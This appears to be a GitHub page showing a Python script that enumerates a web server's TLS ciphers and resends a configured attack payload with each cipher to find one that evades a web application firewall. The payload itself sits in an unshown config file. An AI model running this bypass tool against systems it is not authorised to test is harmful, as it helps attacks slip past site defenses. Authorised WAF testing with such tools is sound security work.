-
Notifications
You must be signed in to change notification settings - Fork 73
/
Copy pathabuse-ssl-bypass-waf.py
171 lines (146 loc) · 5.8 KB
/
abuse-ssl-bypass-waf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
#
import re
import time
try:
import urlparse
except ModuleNotFoundError:
from urllib import parse as urlparse
import argparse
import threading
import subprocess
from threading import Timer
from multiprocessing.dummy import Pool
from config import *
def target_handle(target):
    """Normalize a user-supplied host or URL to ``https://<netloc>``.

    Any scheme already present on ``target`` (``http://``, ``HTTPS://``, ...)
    is discarded and replaced by ``https``. Path, parameters, query and
    fragment are dropped, so only the scheme and network location remain.

    :param target: host, ``host:port`` or full URL
    :return: string of the form ``https://host[:port]``
    """
    # Strip a leading scheme before prefixing "https://". Blindly prefixing
    # something like "http://host" makes urlparse report "http:" as the
    # netloc, which produced the bogus result "https://http:".
    bare = re.sub(r"^[A-Za-z][A-Za-z0-9+.\-]*://", "", target.strip())
    parsed = urlparse.urlparse("https://" + bare)
    return "{}://{}".format(parsed.scheme, parsed.netloc)
def is_alive():
    """Report whether the global ``target`` answered the liveness probe.

    Runs ``alive_command`` against the normalized target through
    ``curl_request`` and treats any non-empty output as proof of life.

    :return: ``True`` if the probe produced output, ``False`` otherwise
    """
    global target
    response = curl_request(target_handle(target), alive_command)
    # Truthiness covers None, "" and b"". On Python 3 the captured stdout is
    # bytes and b"" == "" is False, so comparing against "" would report a
    # silent target as alive.
    return bool(response)
def curl_request(target, command, timeout=15):
    """Run ``command`` against ``target`` and return the captured stdout.

    ``command`` is modified in place so that ``target`` ends up as its final
    element: it overwrites the last element when that element already looks
    like a URL (contains "://"), otherwise it is appended. Other code in this
    file relies on that side effect, so it is kept deliberately.

    :param target: URL handed to the command as its last argument
    :param command: argument list for ``subprocess.Popen``; mutated in place
    :param timeout: seconds after which the child process is killed
    :return: the child's stdout, or ``None`` if collecting the output failed
    """
    if "://" in command[-1]:
        # Replace by index. list.remove(command[-1]) would delete the FIRST
        # element equal to the last one, which may be an earlier argument.
        command[-1] = target
    else:
        command.append(target)
    execute = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # Watchdog: kill the child if it has not finished within `timeout`.
    timer = Timer(timeout, execute.kill)
    try:
        timer.start()
        stdout, _ = execute.communicate()
        return stdout
    except Exception:
        # Best effort: a failed read is reported as "no response". Unlike a
        # bare except, KeyboardInterrupt/SystemExit still propagate.
        return None
    finally:
        timer.cancel()
def get_supported_ciphers():
    """Return the cipher names reported as supported by the global ``target``.

    Runs ``ciphers_command`` against ``target`` through ``curl_request`` with
    a 60 second timeout. Every output line matching
    ``Accepted|Preferred <field> <field> bits <rest>`` contributes the first
    whitespace-separated token of ``<rest>`` as a cipher name.

    :return: list of cipher names; empty when the scan produced no output
    """
    global target
    body = curl_request(target, ciphers_command, timeout=60)
    if not body:
        # curl_request returns None when reading the output failed; report
        # "no ciphers" instead of crashing on None.decode().
        return []
    if isinstance(body, bytes):
        # Tolerate stray non-UTF-8 bytes in the scanner output.
        body = body.decode("utf-8", "ignore")
    # Raw string: "\s" in a plain literal is an invalid escape sequence.
    pattern = re.compile(r"(Accepted|Preferred)\s+(.*?)\s+(.*?)\s+bits\s+(.*)")
    ciphers = []
    for line in body.split("\n"):
        found = pattern.search(line.strip())
        if found:
            ciphers.append(str(found.group(4)).split()[0])
    return ciphers
def single_cipher_request(cipher):
    """Request the payload URL with one forced cipher and report the outcome.

    Builds ``curl_command + ['--cipher', cipher]``, fetches
    ``target + payload_request`` and then, under ``mutex``:

    * keyword mode (``enable_waf_keyword``): a response matching
      ``hit_waf_regex`` or an empty response increments the global ``count``;
      any other response is announced as a bypass and the program exits.
    * length mode: a response whose length differs from ``base_length`` is
      recorded in ``cipher_content_length``; a non-empty response of the same
      length increments ``count``.

    :param cipher: cipher name passed to the ``--cipher`` option
    """
    global target, count, base_length, cipher_content_length
    # `count` is intentionally NOT reset here: it is a running tally over all
    # ciphers that the caller compares with the number of ciphers tested.
    # Copy so the per-cipher options never leak into the shared curl_command.
    command = list(curl_command)
    command.extend(['--cipher', cipher])
    cipher_response = curl_request(target + payload_request, command)
    if cipher_response is None:
        # curl_request returns None when reading the output failed; treat
        # that the same way as an empty response.
        cipher_response = b""
    cipher_length = len(cipher_response)
    # `with` guarantees the lock is released even when exit() below raises
    # SystemExit, so other worker threads are not left blocked on it.
    with mutex:
        if enable_waf_keyword:
            try:
                waf_hits = re.findall(hit_waf_regex, cipher_response)
            except TypeError:
                # Python 3: a str pattern cannot be applied to bytes output.
                waf_hits = re.findall(hit_waf_regex, cipher_response.decode("utf-8", "ignore"))
            if waf_hits:
                count += 1
                print("[-] Cipher:{:35} Filter By Waf!".format(cipher))
            elif cipher_length == 0:
                count += 1
                print("[+] Cipher:{:35} Response Length: [0]".format(cipher))
            else:
                print("[+] Success! Find Bypass Cipher: {}".format(cipher))
                # curl_command[:-1] drops the final element, which is the URL
                # left there by earlier curl_request calls on curl_command.
                exit("[+] Please Test: [{}]".format('{} "{}"'.format(" ".join(curl_command[:-1]), target + payload_request)))
        else:
            if base_length != cipher_length:
                cipher_content_length.append({cipher: cipher_length})
                print("[+] Cipher:{:35} Response Length: [{}]".format(cipher, cipher_length))
            elif cipher_length == 0:
                print("[+] Cipher:{:35} Response Length: [0]".format(cipher))
            else:
                count += 1
                print("[+] Cipher:{:35} Response Length: [Same as Base Response]".format(cipher))
def bypass_testing(threads=1):
    """Drive the whole check: probe, enumerate ciphers, test each, summarize.

    Steps:
      1. Exit unless ``is_alive()`` reports the global ``target`` reachable.
      2. Collect the supported ciphers; exit if there are none.
      3. Fetch two baseline responses (``target`` and
         ``target + normal_request``) and store the baseline length in the
         global ``base_length``.
      4. Call ``single_cipher_request`` for every cipher, through a thread
         pool when ``threads > 1``.
      5. Print whether every cipher failed or the results need manual review.

    :param threads: number of worker threads; values <= 1 run sequentially
    """
    global target, base_length
    if is_alive():
        print("[+] Target: {} is alive".format(target))
    else:
        exit("[-] Target: {} cannot connected".format(target))
    print("[+] Testing Web Server Supported SSL/TLS Ciphers ...")
    ciphers = get_supported_ciphers()
    if len(ciphers) > 0:
        print("[+] {} Supported [{}] SSL/TLS Ciphers".format(target, len(ciphers)))
    else:
        exit("[-] No SSL/TLS Ciphers of target supported")

    # curl_request may return None on failure; fall back to an empty
    # response so the length comparisons below cannot raise TypeError.
    base_content_1 = curl_request(target, curl_command) or b""
    base_content_2 = curl_request(target + normal_request, curl_command) or b""
    if len(base_content_1) == len(base_content_2):
        base_length = len(base_content_1)
        print("[!] Response-1 == Response-2 length:[{}]".format(len(base_content_1)))
    else:
        base_length = len(base_content_2)
        print("[+] Request-1:{} Request-2:{}".format(target, target + normal_request))
        print("[!] Response-1 length:[{}] != Response-2 length:[{}]".format(len(base_content_1), len(base_content_2)))

    print("[+] Now Request: {}".format(target + payload_request))
    if threads > 1:
        pool = Pool(threads)
        try:
            pool.map(single_cipher_request, ciphers)
        finally:
            # Always shut the workers down, even if a request raised.
            pool.close()
            pool.join()
    else:
        for cipher in ciphers:
            single_cipher_request(cipher)

    if not enable_waf_keyword:
        # Count recorded responses that share the first recorded length.
        # The list is empty when no response differed from the baseline;
        # indexing [0] unconditionally would raise IndexError in that case.
        bcl_count = 0
        if cipher_content_length:
            base_cipher_length = list(cipher_content_length[0].values())[0]
            bcl_count = sum(
                1 for entry in cipher_content_length
                if list(entry.values())[0] == base_cipher_length
            )
    else:
        bcl_count = -1
    if count == len(ciphers) or bcl_count == len(ciphers):
        print("[-] Failed! Abusing SSL/TLS Ciphers Cannot Bypass Waf")
    else:
        print("[*] Finished! Please check response content length and find whether there is bypass way")
if __name__ == "__main__":
    # Script entry point: parse the command line, initialise the module-level
    # state shared by the functions above, run the test and print the time.

    # `sys` is not imported at the top of this file; import it explicitly
    # rather than depending on `from config import *` to provide it.
    import sys

    start = time.time()
    parser = argparse.ArgumentParser(prog='abuse-ssl-bypass-waf.py')
    parser.add_argument("-regex", dest='regex', default='default', help="hit waf keyword or regex")
    parser.add_argument("-thread", dest='thread', default=1, type=int, help="numbers of multi threads")
    parser.add_argument("-target", dest='target', default='default', help="the host ip or domain")
    # Show the help text when invoked without any argument.
    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    if args.target == 'default':
        # Without this check the placeholder would be probed as the host
        # "https://default".
        parser.error("-target is required")
    if args.regex != 'default':
        # A regex on the command line switches on keyword matching.
        enable_waf_keyword = True
        hit_waf_regex = args.regex
    # Shared state read and written by the worker functions.
    count = 0
    base_length = 0
    target = target_handle(args.target)
    cipher_content_length = []
    mutex = threading.Lock()
    # argparse already converted -thread to int (type=int).
    bypass_testing(args.thread)
    print("[+] Cost: {:.6} seconds".format(time.time() - start))